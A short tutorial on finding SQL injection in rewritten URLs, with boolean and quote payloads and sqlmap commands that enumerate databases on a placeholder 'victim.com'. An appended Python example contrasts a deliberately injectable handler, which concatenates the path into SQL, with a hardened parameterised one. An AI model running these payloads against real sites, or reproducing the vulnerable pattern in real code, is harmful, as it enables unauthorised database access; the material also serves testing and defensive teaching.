First of all, what is URL rewrite?

You've likely seen sites with this schema in URLs:

https://victim.com/?id=1

Almost everyone knows how to test for SQL injection in this situation:

http://mysite.com/?id=1'
or
http://mysite.com/?id=1 and 2.5=2.5
or
http://mysite.com/?id=1 and 3.4=3.5
and so on.

But with URL rewrites, the URL http://victim.com/?id=1 becomes http://victim.com/1 (the id name is hidden and the parameter 1 is used directly in the URL).

To test for SQL injection in these kinds of URLs, we use our payloads as before, but placed after the parameter:

http://victim.com/1'
or
http://victim.com/1 and 3.6=3.6
http://victim.com/1 and 3.6=3.77
and so on.

The results would be the same as a normal post parameter.

To test for SQL injection with sqlmap, we just put a star (*) in the URL. For instance:

sqlmap -u "http://victim.com/1*" --random-agent --level 5 --risk 3 --dbs

or, for injecting in the content parameter:

sqlmap -u "http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbs

The star sign shows sqlmap where to inject payloads.

Happy Hacking
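Why the rewritten URL behaves exactly like ?id=1, seen from the server side. This is an added example, not code from the original post: the rewrite rule, the pages table and the function names are assumptions, and it compares a handler that concatenates the path segment into SQL with one that validates and binds it.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data standing in for the site's content table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "Home"), (2, "About")])
    return db

# Hypothetical rewrite rule: /<value> is served as ?id=<value>.
# It only moves the value into the path; it does not validate it.
REWRITE = re.compile(r"^/(?P<id>[^/]+)$")

def vulnerable_lookup(db, path):
    """Concatenates the (already URL-decoded) path segment into the SQL text."""
    m = REWRITE.match(path)
    if not m:
        return None
    try:
        row = db.execute("SELECT title FROM pages WHERE id = " + m["id"]).fetchone()
    except sqlite3.Error:
        return "error"  # a broken query, e.g. after a stray quote
    return row[0] if row else None

def hardened_lookup(db, path):
    """Accepts only a decimal id and binds it as a query parameter."""
    m = REWRITE.match(path)
    if not m or not re.fullmatch(r"[0-9]{1,9}", m["id"]):
        return None  # a real handler would answer 404 here
    row = db.execute("SELECT title FROM pages WHERE id = ?", (int(m["id"]),)).fetchone()
    return row[0] if row else None

def compare(path):
    """Returns (vulnerable result, hardened result) for one request path."""
    db = make_db()
    return vulnerable_lookup(db, path), hardened_lookup(db, path)

if __name__ == "__main__":
    # The test values used in the text above, placed after the rewritten id.
    for p in ["/1", "/1 and 3.6=3.6", "/1 and 3.6=3.77", "/1'"]:
        print(repr(p), compare(p))
```

With the vulnerable handler the true and false conditions return different pages, which is the signal the manual test looks for; the hardened handler gives the same "not found" answer to every non-numeric path.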